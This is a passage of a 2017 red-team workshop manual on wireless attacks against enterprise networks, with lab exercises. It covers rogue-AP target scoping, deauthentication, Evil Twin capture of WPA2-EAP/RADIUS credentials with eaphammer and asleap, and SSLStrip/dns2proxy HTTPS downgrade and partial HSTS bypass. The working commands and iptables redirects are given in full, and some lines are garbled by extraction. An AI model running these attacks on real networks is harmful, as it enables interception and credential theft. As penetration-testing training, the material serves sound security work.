Prefixes The first three octets in a mac address identify the manufacture of the device. If we discover evidence that the client has a contract with certain hardware manufactures, we focus our attention on APs with OUI prefixes that correspond to these brands. Using Geographic Cross-Referencing To Identify In-Scope Access Points The most powerful technique we can leverage is geographic cross-referencing. We mentioned that Evil Corp has 57 offices worldwide. If we see the same ESSIDs appear at two Evil Corp locations, and no other 3rd party is present at both of these locations as well, it is safe to conclude that the ESSID is used by Evil Corp. We’ll apply these principles to identify in-scope access points in our airodump-ng output from the last section. Before we continue, we should attempt to decloak any wireless access points that have hidden ESSIDs. We do this by very briefly deauthenticating one or more clients from each of the hidden networks. Our running airodump-ng session will then sniff the ESSID of the affected access point as the client reassociates. Tools such as Kismet will do this automatically, although on sensitive engagements it’s preferable to do this manually in a highly controlled fashion. To perform the deauthentication attack, we use the following command: If successful, the ESSID of the affected access point will appear in our airodump-ng output. CH 11 ][ Elapsed: 1 min ][ 2017-02-02 13:49 BSSID PWR RXQ Beacons #Data #/s CH MB ENC CIPHER AUTH ESSID 1C:7E:E5:E2:EF:D9 -66 10 572 283 0 1 54 WPA2 CCMP MGT EC7293 1C:7E:E5:E2:EF:D8 -66 11 569 83 1 1 54 WPA2 CCMP MGT EC7293 1C:7E:E5:E2:EF:D7 -66 12 580 273 0 1 54 WPA2 CCMP MGT EC7293 1C:7E:E5:E2:EF:D6 -66 10 566 43 0 1 54 WPA2 CCMP MGT 1C:7E:E5:62:32:21 -68 11 600 24 0 6 54 WPA2 CCMP MGT 1C:7E:E5:97:79:A4 -68 0 598 82 2 6 54 WPA2 CCMP MGT ECwnet1 1C:7E:E5:97:79:A5 -68 9 502 832 0 6 54 WPA2 CCMP MGT ECwnet1 1C:7E:E5:97:79:B1 -64 14 602 23 0 6 54 WPA2 CCMP MGT ECwnet1 1C:7E:E5:97:79:A6 -65 12 601 42 0 11 54 WPA2 CCMP MGT ECMNV32 1C:7E:E5:97:79:A7 -62 12 632 173 0 11 54 WPA2 CCMP MGT ECMNV32 1C:7E:E5:97:79:A8 -62 10 601 21 1 11 54 WPA2 CCMP MGT ECMNV32 00:17:A4:06:E4:C6 -74 10 597 12 0 6 54 WPA2 TKIP MGT MNBR83 00:17:A4:06:E4:C7 -74 8 578 234 0 6 54 WPA2 TKIP MGT MNBR83 00:17:A4:06:E4:C8 -74 10 508 11 1 6 54 WPA2 TKIP MGT MNBR83 00:17:A4:06:E4:C9 -72 11 535 12 0 1 54 WPA2 TKIP MGT 00:13:E8:80:F4:04 -74 11 521 132 0 1 54 WPA2 TKIP MGT prN67n 00:22:18:38:A4:64 -68 12 576 10 0 3 54 WPA2 CCMP MGT ASFWW 00:22:18:38:A4:65 -68 12 577 431 0 3 54 WPA2 CCMP MGT ASFWW root@localhost:~# aireplay-ng -b <name of bssid here> -c <mac address of client (optional)> <interface name> Advanced Wireless Attacks Against Enterprise Networks Target Identification Within A Red Team Environment © 2017 Gabriel Ryan All Rights Reserved 7 We have now identified six unique ESSIDs present at the client site. We can cross reference these ESSIDs with the results of similar site surveys performed at nearby client sites. Suppose we know of another Evil Corp branch office 30 miles away. After driving to the secondary location, we discover that none of the third-party entities located at the first branch office are present. Suppose that after decloaking hidden networks, we see that the following access points are within range. CH 11 ][ Elapsed: 1 min ][ 2017-02-02 13:49 BSSID PWR RXQ Beacons #Data #/s CH MB ENC CIPHER AUTH ESSID D1:3F:E5:A8:B1:77 -66 10 572 283 0 1 54 WPA2 CCMP MGT EC7293 D1:3F:E5:A8:B1:78 -66 11 569 83 1 1 54 WPA2 CCMP MGT EC7293 D1:3F:E5:A8:B1:79 -66 12 580 273 0 1 54 WPA2 CCMP MGT D1:3F:E5:B6:A0:08 -66 10 566 43 0 1 54 WPA2 CCMP MGT ECMNV32 D1:3F:E5:B6:A0:07 -68 11 600 24 0 6 54 WPA2 CCMP MGT 02:12:0B:86:3B:E0 -68 0 598 82 2 6 54 WPA2 CCMP MGT ZP993 02:12:0B:86:3B:E1 -68 9 502 832 0 6 54 WPA2 CCMP MGT 02:12:0B:86:3B:E2 -64 14 602 23 0 6 54 WPA2 CCMP MGT ZP993 72:71:78:D5:C8:02 -65 12 601 42 0 11 54 WPA2 CCMP MGT SaintConGuest 00:12:E8:99:11:11 -62 12 632 173 0 11 54 WPA2 CCMP MGT prN67n Out of the ESSIDs shown above, the ones that are highlighted in red were also found at the first Evil Corp location that we visited. Given the lack of common third-parties present at each of the sites, this is very strong evidence that these ESSIDs are used by Evil Corp, and are therefore in- scope. Expanding The Scope By Identifying Sequential BSSIDs Let’s return to the first client site. Notice that the BSSIDs outlined in red increment sequentially. As previously mentioned, this usually occurs when the APs are part of the same network. We know that EC7293 is in-scope (we confirmed this using geographic cross-referencing). Given that the access points serving EC7293 and ECwnet1 are part of the same group of sequentially incrementing BSSIDs, we can conclude they are both parts of the same network. Therefore, it follows that ECwnet1 is in-scope as well. CH 11 ][ Elapsed: 1 min ][ 2017-02-02 13:49 BSSID PWR RXQ Beacons #Data #/s CH MB ENC CIPHER AUTH ESSID 1C:7E:E5:E2:EF:D9 -66 10 572 283 0 1 54 WPA2 CCMP MGT EC7293 1C:7E:E5:E2:EF:D8 -66 11 569 83 1 1 54 WPA2 CCMP MGT EC7293 1C:7E:E5:E2:EF:D7 -66 12 580 273 0 1 54 WPA2 CCMP MGT EC7293 1C:7E:E5:E2:EF:D6 -66 10 566 43 0 1 54 WPA2 CCMP MGT 1C:7E:E5:62:32:21 -68 11 600 24 0 6 54 WPA2 CCMP MGT 1C:7E:E5:97:79:A4 -68 0 598 82 2 6 54 WPA2 CCMP MGT ECwnet1 1C:7E:E5:97:79:A5 -68 9 502 832 0 6 54 WPA2 CCMP MGT ECwnet1 1C:7E:E5:97:79:B1 -64 14 602 23 0 6 54 WPA2 CCMP MGT ECwnet1 1C:7E:E5:97:79:A6 -65 12 601 42 0 11 54 WPA2 CCMP MGT ECMNV32 1C:7E:E5:97:79:A7 -62 12 632 173 0 11 54 WPA2 CCMP MGT ECMNV32 1C:7E:E5:97:79:A8 -62 10 601 21 1 11 54 WPA2 CCMP MGT ECMNV32 00:17:A4:06:E4:C6 -74 10 597 12 0 6 54 WPA2 TKIP MGT MNBR83 00:17:A4:06:E4:C7 -74 8 578 234 0 6 54 WPA2 TKIP MGT MNBR83 00:17:A4:06:E4:C8 -74 10 508 11 1 6 54 WPA2 TKIP MGT MNBR83 00:17:A4:06:E4:C9 -72 11 535 12 0 1 54 WPA2 TKIP MGT 00:13:E8:80:F4:04 -74 11 521 132 0 1 54 WPA2 TKIP MGT prN67n Advanced Wireless Attacks Against Enterprise Networks Target Identification Within A Red Team Environment © 2017 Gabriel Ryan All Rights Reserved 8 00:22:18:38:A4:64 -68 12 576 10 0 3 54 WPA2 CCMP MGT ASFWW 00:22:18:38:A4:65 -68 12 577 431 0 3 54 WPA2 CCMP MGT ASFWW We’ve mapped our in-scope attack surface. Our targets will be the following access points: BSSID ESSID 1C:7E:E5:E2:EF:D9 EC7293 1C:7E:E5:E2:EF:D8 EC7293 1C:7E:E5:E2:EF:D7 EC7293 1C:7E:E5:E2:EF:D6 1C:7E:E5:62:32:21 1C:7E:E5:97:79:A4 ECwnet1 1C:7E:E5:97:79:A5 ECwnet1 1C:7E:E5:97:79:B1 ECwnet1 1C:7E:E5:97:79:A6 ECMNV32 1C:7E:E5:97:79:A7 ECMNV32 1C:7E:E5:97:79:A8 ECMNV32 00:13:E8:80:F4:04 prN67n Advanced Wireless Attacks Against Enterprise Networks Attacking And Gaining Entry To WPA2-EAP Wireless Networks © 2017 Gabriel Ryan All Rights Reserved 9 Attacking And Gaining Entry To WPA2-EAP Wireless Networks Chapter Overview Rogue access point attacks are the bread and butter of modern wireless penetration tests. They can be used to perform stealthy man-in-the-middle attacks, steal RADIUS credentials, and trick users into interacting with malicious captive portals. Penetration testers can even use them for traditional functions such as deriving WEP keys and capturing WPA handshakes [1]. Best of all, they are often most effective when used out of range of the target network. For this workshop, we will focus primarily on using Evil Twin attacks. Wireless Theory: Evil Twin Attacks An Evil Twin is a wireless attack that works by impersonating a legitimate access point. The 802.11 protocol allows clients to roam freely from access point to access point. Additionally, most wireless implementations do not require mutual authentication between the access point and the wireless client. This means that wireless clients must rely exclusively on the following attributes to identify access points: 1. BSSID – The access point’s Basic Service Set identifier, which refers to the access point and every client that is associated with it. Usually, the access point's MAC address is used to derive the BSSID. 2. ESSID – The access point’s Extended Service Set identifier, known colloquially as the AP’s “network name.” An Extended Service Set (ESS) is a collection of Basic Service Sets connected using a common Distribution System (DS). 3. Channel – The operating channel of the access point. [22] To execute the attack, the attacker creates an access point using the same ESSID and channel as a Advanced Wireless Attacks Against Enterprise Networks Attacking And Gaining Entry To WPA2-EAP Wireless Networks © 2017 Gabriel Ryan All Rights Reserved 10 legitimate AP on the target network. So long as the malicious access point has a more powerful signal strength than the legitimate AP, all devices connected to the target AP will drop and connect to the attacker. [22] Wireless Theory: WPA2-EAP Networks Now let’s talk about WPA2-EAP networks. The most commonly used EAP implementations are EAP-PEAP and EAP-TTLS. Since they’re very similar to one another from a technical standpoint, we’ll be focusing primarily on EAP-PEAP. However, the techniques learned in this workshop can be applied to both. The EAP-PEAP authentication process is an exchange that takes place between three parties: the wireless client (specifically, software running on the wireless client), the access point, and the authentication server. We refer to the wireless client as the supplicant and the access point as the authenticator [2]. Logically, authentication takes place between the supplicant and the authentication server. When a client device attempts to connect to the network, the authentication server presents the supplicant with an x.509 certificate. If the client device accepts the certificate, a secure encrypted tunnel is established between the authentication server and the supplicant. The authentication attempt is then performed through the encrypted tunnel. If the authentication attempt succeeds, the client device is permitted to associate with the target network [2][3]. Advanced Wireless Attacks Against Enterprise Networks Attacking And Gaining Entry To WPA2-EAP Wireless Networks © 2017 Gabriel Ryan All Rights Reserved 11 Without the use of the secure tunnel to protect the authentication process, an attacker could sniff the challenge and response then derive the password offline. In fact, legacy implementations of EAP, such as EAP-MD5, are susceptible to this kind of attack. However, the use of a secure tunnel prevents us from using passive techniques to steal credentials for the target network [2][3]. Although we can conceptualize the EAP-PEAP authentication process as an exchange between the supplicant and the authentication server, the protocol’s implementation is a bit more complicated. All communication between the supplicant and the authentication server is relayed by the authenticator (the access point). The supplicant and the authenticator communicate using a Layer 2 protocol such as IEEE 802.11X, and the authenticator communicates with the authentication server using RADIUS, which is a Layer 7 protocol. Strictly speaking, the authentication server and supplicant do not actually communicate directly to one another at all [2][3]. Advanced Wireless Attacks Against Enterprise Networks Attacking And Gaining Entry To WPA2-EAP Wireless Networks © 2017 Gabriel Ryan All Rights Reserved 12 As you can imagine, this architecture creates numerous opportunities for abuse once an attacker can access the network. However, for now, we’re going to focus on abusing this authentication process to gain access to the network in the first place. Let’s revisit the EAP-PEAP authentication process, but this time in further detail. [18] The diagram above illustrates the EAP-PEAP/EAP-TTLS authentication process in full detail. When the supplicant associates, it sends an EAPOL-Start to the authenticator. The authenticator then sends an EAP-Request Identity to the supplicant. The supplicant responds with its identity, which is forwarded to the authentication server. The authentication server and supplicant then Advanced Wireless Attacks Against Enterprise Networks Attacking And Gaining Entry To WPA2-EAP Wireless Networks © 2017 Gabriel Ryan All Rights Reserved 13 setup a secure SSL/TLS tunnel through the authenticator, and the authentication process takes place through this tunnel [2]. Until the tunnel is established, the authenticator is essentially acting as an open access point. Even though the authentication process occurs through a secure tunnel, the encrypted packets are still being sent over open wireless. The WPA2 doesn’t kick in until the authentication process is complete. Open wireless networks are vulnerable to Evil Twin attacks because there is no way for the wireless client to verify the identity of the access point to which it is connecting. Similarly, EAP-PEAP and EAP-TTLS networks are vulnerable to Evil Twin attacks because there is no way to verify the identity of the authenticator [4]. In theory, the certificate presented to the supplicant by the authentication server could be used to verify the identity of the authentication server. However, this is only true so long as the supplicant does not accept invalid certificates. Many supplicants do not perform proper certificate validation. Many other are configured by users or administrators to accept untrusted certificates automatically. Even if the supplicant is configured correctly, the onus is still placed on the user to decline the connection when presented with an invalid certificate [5]. To compromise EAP-PEAP, the attacker first performs an Evil Twin attack against the target access point (which is serving as the authenticator). When a client connects to the rogue access point, it begins an EAP exchange with the attacker’s authenticator and authentication server. If the supplicant accepts the attacker’s certificate, a secure tunnel is established between the attacker’s authentication server and the supplicant. The supplicant then completes the authentication process with the attacker, and the attacker uses the supplicant’s challenge and response to derive the victim’s password [4][5]. Evil Twin Attack Using Hostapd-WPE The first phase of this attack will be to create an Evil Twin using eaphammer. Traditionally, this attack is executed using a tool called hostapd-wpe. Although hostapd-wpe is a powerful tool in its own right, it can be quite cumbersome to use and configure. Eaphammer provides an easy to use command line interface to hostapd-wpe and automates its traditionally time-consuming configuration process. We’ll begin by creating a self-signed certificate using eaphammer’s --cert-wizard flag. The Cert Wizard routine will walk you through the creation of a self-signed x.509 certificate automatically. You will be prompted to enter values for a series of attributes that will be used to create your cert. root@localhost:~# ./eaphammer --cert-wizard Advanced Wireless Attacks Against Enterprise Networks Attacking And Gaining Entry To WPA2-EAP Wireless Networks © 2017 Gabriel Ryan All Rights Reserved 14 It's best to choose values for your self-signed certificate that are believable within the context of your target organization. Since we’re attacking Evil Corp, the following examples values would be good choices: 1. Country – US 2. State – Nevada 3. Locale – Las Vegas 4. Organization – Evil Corp 5. Email – admin@evilcorp.com 6. CN – admin@evilcorp.com When the Cert Wizard routine finishes, you should see output similar to what is shown in the screenshot below. Once we have created a believable certificate, we can proceed to launch an Evil Twin attack against one of the target access points discovered in the last section. Let’s use eaphammer to perform an Evil Twin attack against the access point with BSSID 1c:7e:e5:97:79:b1. root@localhost:~# ./eaphammer.py --bssid 1C:7E:E5:97:79:B1 --essid ECwnet1 --channel 2 --wpa 2 --auth peap --interface wlan0 --creds Advanced Wireless Attacks Against Enterprise Networks Attacking And Gaining Entry To WPA2-EAP Wireless Networks © 2017 Gabriel Ryan All Rights Reserved 15 Provided you can overpower the signal strength of the target access point, clients will begin to disconnect from the target network and connect to your access point. Unless the affected client devices are configured to reject invalid certificates, the victims of the attack will be presented with a message similar to the one below. Fortunately, it’s usually possible to find at least one enterprise employee who will blindly accept your certificate. It’s also common to encounter devices that are configured to accept invalid certificates automatically. In either case, you’ll soon see usernames, challenges, and responses shown in your terminal as shown below. This data can be passed to asleap to obtain a valid set of RADIUS credentials. Congrats. You have your first set of RADIUS creds. root@localhost:~# asleap –C <challenge> -R <response> -W <wordlist> Advanced Wireless Attacks Against Enterprise Networks Attacking And Gaining Entry To WPA2-EAP Wireless Networks © 2017 Gabriel Ryan All Rights Reserved 16 Lab Exercise: Evil Twin Attack Against WPA2-PEAP For this lab exercise, you will practice stealing RADIUS credentials by performing an Evil Twin attack against a WPA2-EAP network. 1. Using your wireless router: a. Create a WPA2-EAP network with the EAP type set to PEAP or TTLS. Make sure to set the EAP password to “2muchswagg” without the quotes. 2. From your Windows AD Victim VM: a. Connect to the WPA2-EAP network using your secondary external wireless adapter. 3. From your Kali Linux VM: a. Use airodump-ng to identify your newly created WPA2-EAP network b. Use eaphammer to generate a believable self-signed certificate c. Use eaphammer to capture an EAP Challenge and Response by performing an Evil Twin attack against the WPA2-EAP network d. Use asleap to obtain a set of RADIUS credentials from the Challenge and Response captured in step 3b. Make sure to use the rockyou wordlist, which is located at /usr/share/wordlists/rockyou.txt. Advanced Wireless Attacks Against Enterprise Networks Wireless Man-In-The-Middle Attacks © 2017 Gabriel Ryan All Rights Reserved 17 Wireless Man-In-The-Middle Attacks Chapter Overview In Attacking and Gaining Entry to WPA2-EAP Wireless Networks, we used an Evil Twin attack to steal EAP credentials. This was a relatively simple attack that was performed primarily on Layer 2 of the OSI stack, and worked very well for its intended purpose. However, if we want to do more interesting things with our rogue access point attacks, we’re going to have to start working at multiple levels of the OSI stack. Suppose we wanted to use an Evil Twin to perform a man-in-the-middle attack similar to ARP Poisoning. In theory, this should be possible since in an Evil Twin attack the attacker is acting as a functional wireless access point. Furthermore, such an attack would not degrade the targeted network in the same way that traditional attacks such as ARP Poisoning do. Best of all, such an attack would be very stealthy, as it would not generate additional traffic on the targeted network. To be able to execute such an attack, we will need to expand the capabilities of our rogue access point to make it behave more like a wireless router. This means running our own DHCP server to provide IP addresses to wireless clients, as well as a DNS server for name resolution. It also means that we’ll need to use an operating system that supports packet forwarding. Finally, we’ll need a simple yet flexible utility that redirects packets from one network interface to another. We'll do this by using dnsmasq as our DHCP server and iptables to route packets. To provide DNS, we can issue a DHCP Option that tells clients to use Google's nameservers. For our operating Advanced Wireless Attacks Against Enterprise Networks Wireless Man-In-The-Middle Attacks © 2017 Gabriel Ryan All Rights Reserved 18 system, we'll continue to use Linux since it provides an easy to use API with which to enable packet forwarding at the kernel level. Configuring Linux As A Router Before we begin, execute the following commands to prevent extraneous processes from interfering with the rogue access point. For our access point, we’ll use hostapd once again. Technically, we don’t have much choice in the matter if we continue to use Linux as an attack platform. This is because hostapd is actually the userspace master mode interface provided by mac80211, which is the wireless stack used by modern Linux kernels. Hostapd is very simple to use and configure. The snippet included above represents a minimal configuration file used by hostapd. You can paste it into a file named hostapd.conf and easily create an access point using the following syntax. After starting our access point, we can give it an IP address and subnet mask using the commands shown below. We’ll also update our routing table to allow our rogue AP to serve as the default gateway of its subnet. root@localhost~# service network-manager stop root@localhost~# rfkill unblock wlan root@localhost~# ifconfig wlan0 up interface=wlan0 driver=nl80211 ssid=FREE_WIFI channel=1 hw_mode=g root@localhost~# hostapd ./hostapd.conf root@localhost~# ifconfig wlan0 10.0.0.1 netmask 255.255.255.0 root@localhost~# route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 Advanced Wireless Attacks Against Enterprise Networks Wireless Man-In-The-Middle Attacks © 2017 Gabriel Ryan All Rights Reserved 19 For DHCP, we can use either dhcpd or dnsmasq. The second option can often be easier to work with, particularly since it can be used as a DNS server if necessary. A typical dnsmasq.conf file looks like this: The first entry in the snippet shown above defines a DHCP pool of 10.0.0.80 through 10.0.0.254. The second two entries are DHCP Options that are used to tell clients where to find the nameserver and network gateway. The dhcp-authoritative flag specifies that we are the only DHCP server on the network. The log-queries entry is self-explanatory. Copy the config snippet shown above into a file named dnsmasq.conf, and run in a new terminal using the following syntax. By default, dnsmasq binds to the wildcard address. Since we don't want dnsmasq to do this, we keep it from doing so using the -z flag. Additionally, we use the -i flag to force dnsmasq to only listen on our $phy interface. We use the -I flag to explicity forbid dnsmasq from running on our local interface. The -p flag is used to indicate the port on which dnsmasq should bind when acting as a DNS server. Setting the -p flag to 0 instructs dnsmasq to not start its DNS server at all. We have an access point, a DNS server, and a DHCP server. To enable packet forwarding in Linux, we use the proc filesystem as shown below. Finally, we configure iptables to allow our access point to act as a NAT. Iptables is a userspace utility that allows administrators to configure the tables of the Linux kernel firewall manually. This is by far the most interesting yet complicated part of this attack. We begin by setting the default policy for the INPUT, OUTPUT, and FORWARD chains in iptables to accept all packets by default. We then flush all tables to give iptables a clean slate. # define DHCP pool dhcp-range=10.0.0.80,10.0.0.254,6h # set Google as nameserver dhcp-option=6,8.8.8.8 # set rogue AP as Gateway dhcp-option=3,10.0.0.1 #Gateway dhcp-authoritative log-queries dnsmasq -z -p 0 -C ./dnsmasq.conf -i "$phy" -I lo aroot@localhost~# echo ‘1’ > /proc/sys/net/ipv4/ip_forward root@localhost~# iptables --policy INPUT ACCEPT root@localhost~# iptables --policy FORWARD ACCEPT root@localhost~# iptables --policy OUTPUT ACCEPT root@localhost~# iptables --flush root@localhost~# iptables --table nat --flush Advanced Wireless Attacks Against Enterprise Networks Wireless Man-In-The-Middle Attacks © 2017 Gabriel Ryan All Rights Reserved 20 We then append a new rule to the POSTROUTING chain of the nat table. Any changes made to the packet by the POSTROUTING chain are not visible to the Linux machine itself since the chain is applied to every packet before it leaves the system. The rule chain that we append to POSTROUTING is called MASQUERADE. When applied to a packet, the MASQUERADE rule chain sets the source IP address to the outbound NIC’s external IP address. This effectively creates a NAT. Unlike the SNAT rule chain, which serves a similar function, the MASQUERADE rule chain determines the NIC’s external IP address dynamically. This makes it a great option when working with a dynamically allocated IP address. The rule also says that the packet should be sent to eth0 after the MASQUERADE rule chain is applied. To summarize, the command shown above tells iptables to modify the source address of each packet to eth0’s external IP address and to send each packet to eth0 after this modification occurs. [19] In the diagram shown above, any packets with a destination address that is different from our rogue AP’s local address will be sent to the FORWARD chain after the routing decision is made. We need to add a rule that states that any packets sent to the FORWARD chain from wlan0 should be sent to our upstream interface. The relevant command is shown below. That’s everything we need to use Linux as a functional wireless router. We can combine these commands and configurations into a single script that can be used to start a fully functional wireless root@localhost~# iptables --table nat --append POSTROUTING -o $upstream -- jump MASQUERADE root@localhost~# iptables --append FORWARD -i $phy -o $upstream --jump ACCEPT Advanced Wireless Attacks Against Enterprise Networks Wireless Man-In-The-Middle Attacks © 2017 Gabriel Ryan All Rights Reserved 21 hotspot. Such a script can be found in the ~/awae/lab2 directory in your Kali VM, as well as at the following URL: ▪ https://github.com/s0lst1c3/awae/blob/master/lab2/hotspot.sh Lab Exercise: Using Linux As A Router For this exercise, you will practice using your Kali VM as a functional wireless hotspot. 1. Begin by ensuring that your host operating system has a valid internet connection. 2. From your Kali VM, use the bash script in your ~/awae/lab2 directory to create a wireless hotspot. 3. From either your cell phone or your Windows AD Victim VM, connect to your wireless hotspot and browse the Internet. In your Kali VM, observe the hostapd and dnsmasq output that appears in your terminal. Classic HTTPS Downgrade Attack Now that we know how to turn our Linux VM into a wireless router, let’s turn it into a wireless router that can steal creds. We’ll do this by using iptables to redirect all HTTP and HTTPS traffic to a tool called SSLStrip. This tool will perform two essential functions. First, it will create a log of all HTTP traffic sent to or from the victim. We can then search this log for credentials and other sensitive data. Second, it will attempt to break the encryption of any HTTPS traffic it encounters using a technique called SSL Stripping [6]. SSL Stripping was first documented by an excellent hacker known as Moxie Marlinspike. In an SSL Stripping attack, the attacker first sets up a man-in-the-middle between the victim and the HTTP server. The attacker then begins to proxy all HTTP(S) traffic between the victim and the server. When the victim makes a request to access a secure resource, such as a login page, the attacker receives the request and forwards it to the server. From the server’s perspective, the request appears to have been made by the attacker [6]. Consequently, an encrypted tunnel is established between the attacker and the server (instead of between the victim and the server). The attacker then modifies the server’s response, converting it from HTTPS to HTTP, and forwards it to the victim. From the victim’s perspective, the server has just issued it an HTTP response [6]. Advanced Wireless Attacks Against Enterprise Networks Wireless Man-In-The-Middle Attacks © 2017 Gabriel Ryan All Rights Reserved 22 All subsequent requests from the victim and the server will occur over an unencrypted HTTP connection with the attacker. The attacker will forward these requests over an encrypted connection with the HTTP server. Since the victim’s requests are sent to the attacker in plaintext, they can be viewed or modified by the attacker [6]. The server believes that it has established a legitimate SSL connection with the victim, and the victim believes that the attacker is a trusted web server. This means that no certificate errors will occur on the client or the server, rendering both affected parties completely unaware that the attack is taking place [6]. Let’s modify our bash script from Configuring Linux As A Router so that it routes all HTTP(S) traffic to SSLStrip. We’ll do this by appending a new rule to iptables’ PREROUTING chain. Rules appended to the PREROUTING chain are applied to all packets before the kernel touches them. By appending the REDIRECT rule shown below to PREROUTING, we ensure that all HTTP and HTTPS traffic is redirected to a proxy running on port 10000 in userspace [7][8]. We then add the following call to SSLStrip, using the -p flag to log only HTTP POST requests. root@localhost~# iptables --table nat --append PREROUTING --protocol tcp - -destination-port 80 --jump REDIRECT --to-port 10000 root@localhost~# iptables --table nat --append PREROUTING --protocol tcp - -destination-port 443 --jump REDIRECT --to-port 10000 root@localhost~# python -l 10000 -p -w ./sslstrip.log Advanced Wireless Attacks Against Enterprise Networks Wireless Man-In-The-Middle Attacks © 2017 Gabriel Ryan All Rights Reserved 23 The updated bash script can be found on your Kali VM in the ~/awae/lab3 directory, as well as at the following URL: ▪ https://github.com/s0lst1c3/awae/blob/master/lab3/http-downgrade.sh Lab Exercise: Wireless MITM With And HTTP Downgrade Let’s use the script we wrote in the last section to perform a wireless Man-in-the-Middle attack using an Evil Twin and SSLStrip. 1. Begin by ensuring that your host operating system has a valid internet connection. 2. Create an account at https://wechall.net using a throwaway email address. 3. If currently authenticated with https://wechall.net, logout. 4. Create an open network named “FREE_WIFI” using your wireless router 5. From your Windows AD Victim VM, connect to “FREE_WIFI” and browse the Internet. 6. From your Kali VM: a. Use the updated bash script to perform an Evil Twin attack against “FREE_WIFI” b. Observe the output that appears in your terminal when the Windows AD Victim VM connects to your rogue access point 7. From your Windows AD Victim VM: a. Browse the internet, observing the output that appears in your terminal b. Navigate to http://wechall.net. c. Authenticate with http://wechall.net using the login form to the right of the screen. 8. From your Kali VM: a. As your authentication attempt occurred over an unencrypted connection, your WeChall credentials should now be in ./sslstrip.log. Find them. b. From your Windows AD Victim VM: c. Logout of http://wechall.net d. Navigate to https://wechall.net e. Authenticate with https://wechall.net using the login form to the right of the screen. 9. Despite the fact that your authentication attempt occurred over HTTPS, your WeChall credentials should have been added to ./sslstrip.log a second time. Find this second set of credentials. Downgrading Modern HTTPS Implementations Using Partial HSTS Bypasses Before beginning this section, repeat Lab Exercise: Wireless MITM Using Evil Twin and SSLStrip using your Twitter account. You should notice that the attack fails. This is due to a modern SSL/TLS implementation known as HSTS. HSTS is an enhancement of the HTTPS protocol that was designed to mitigate the weaknesses exploited by tools such as SSLStrip [9]. When an HTTP client requests a resource from an HSTS enabled web server, the server adds the following header to the response: Advanced Wireless Attacks Against Enterprise Networks Wireless Man-In-The-Middle Attacks © 2017 Gabriel Ryan All Rights Reserved 24 This header tells the browser that it should always request content from the domain over HTTPS. Most modern browsers maintain a list of sites that should always be treated this way [10]. When the web browser receives HSTS headers from a server, it adds the server’s domain to this list. If the user attempts to access a site over HTTP, the browser first checks if the domain is in the list. If it is, the browser will automatically perform a 307 Internal Redirect and requests the resource over HTTPS instead [9]. The IncludeSubdomains attribute can be added to HSTS headers to tell a web browser that all subdomains of the server’s domain should be added to the list as well [9]. For example, suppose a user attempts to access the following URL: If the server responds with the following HSTS headers, the user’s browser will assume that any request to *.evilcorp.com should be loaded over HTTPS as well. Additionally, site administrators have the option of adding their domain to an HSTS preload list that ships with every new version of Firefox and Google Chrome. Domains included in the HSTS preload list are treated as HSTS sites regardless of whether the browser has received HSTS headers for that domain. HSTS is an effective means of protecting against SSL Stripping attacks. However, it is possible to perform a partial-HSTS bypass when the following conditions are met: 1. The server’s domain has not been added to the HSTS preload list with the IncludeSubdomains attribute set. 2. The server issues HSTS headers without the IncludeSubdomains attribute set. The following technique was first documented by LeonardoNve during his BlackHat Asia 2014 presentation OFFENSIVE: Exploiting changes on DNS server configuration [11]. To begin, the attacker first establishes a man-in-the-middle as in the original SSL Stripping attack. However, instead of merely proxying HTTP, the attacker also proxies and modifies DNS traffic. When a victim navigates to www.evilcorp.com, for example, the attacker redirects the user to wwww.evilcorp.com over HTTP. Accomplishing this can be as simple as responding with a 302 redirect that includes the following location header: https://evilcorp.com Strict-Transport-Security: max-age=<expire-time>; includeSubDomains Strict-Transport-Security: max-age=31536000 Advanced Wireless Attacks Against Enterprise Networks Wireless Man-In-The-Middle Attacks © 2017 Gabriel Ryan All Rights Reserved 25 The user’s browser then makes a DNS request for wwww.evilcorp.com. Since all DNS traffic is proxied through the attacker, the DNS request is intercepted by the attacker. The attacker then responds using his or her own DNS server, resolving wwww.evilcorp.com to the IP address of www.evilcorp.com. The browser then makes an HTTP request for wwww.evilcorp.com. This request is intercepted by the attacker and modified so that it is an HTTPS request for www.evilcorp.com. As in the original SSL Stripping attack, an encrypted tunnel is established between the attacker and www.evilcorp.com, and the victim makes all requests to wwww.evilcorp.com over plaintext [11]. This technique is effective provided that certificate pinning is not used, and that the user does not notice that they are interacting with a different subdomain than the one originally requested (i.e. wwww.evil.com vs www.evilcorp.com). To deal with the second issue, an attacker should choose a subdomain that is believable within the context in which it is used (i.e. mail.evilcorp.com should be replaced with something like mailbox.evilcorp.com). Let’s update our bash script so that it performs a partial HSTS bypass using LeonardoNve’s DNS2Proxy and SSLStrip2. We do this by first adding a line that uses iptables to redirect all DNS traffic to dns2proxy. We then replace our call to SSLStrip with a call to SSLStrip2. Location: http://wwww.evilcorp.com root@localhost~# iptables --table nat --append PREROUTING --protocol udp - -destination-port 53 --jump REDIRECT --to-port 53 root@localhost~# python /opt/sslstrip2/sslstrip2.py -l 10000 -p -w ./sslstrip.log & Advanced Wireless Attacks Against Enterprise Networks Wireless Man-In-The-Middle Attacks © 2017 Gabriel Ryan All Rights Reserved 26 Finally, we add a call to dns2proxy as shown below. Our completed bash script can be found in your Kali VM within the ~/awae/lab4 directory, as well as at the following URL: ▪ https://github.com/s0lst1c3/awae/blob/master/lab4/partial-hsts-bypass.sh root@localhost~# python /opt/dns2proxy/dns2proxy.py –i $phy & Advanced Wireless Attacks Against Enterprise Networks Wireless Man-In-The-Middle Attacks © 2017 Gabriel Ryan All Rights Reserved 27 Lab Exercise: Wireless MITM With Partial HSTS Bypass 1. Populate your browser’s HSTS list by attempting to login to Bing.com 2. Repeat Lab Exercise: Wireless MITM Using Evil Twin and SSLStrip using the completed bash script. Instead of capturing your own WeChall credentials, capture your own Bing credentials as you attempt to login to Bing.com instead. You should notice requests to wwww.bing.com as you do this. Advanced Wireless Attacks Against Enterprise Networks SMB Relays And LLMNR/NBT-NS Poisoning © 2017 Gabriel Ryan All Rights Reserved 28 SMB Relays And LLMNR/NBT-NS Poisoning Chapter Overview In this section we will learn two highly effective network attacks that can be used to target Active Directory environments. Although these attacks may seem unrelated to the wireless techniques we’ve been using up until this point, we’ll be combining both of them with Evil Twin attacks in the next section. LLMNR And NBT-NS Poisoning Using Responder Let’s talk about how NetBIOS name resolution works. When a Windows computer attempts to resolve a hostname, it first checks in an internal cache. If the hostname is not in the cache, it then checks its LMHosts file [12]. If both of these name resolution attempts fail, the Windows computer begins to attempt to resolve the hostname by querying other hosts on the network. It first attempts using a DNS lookup using any local nameservers that it is aware of. If the DNS lookup fails, it then broadcasts an 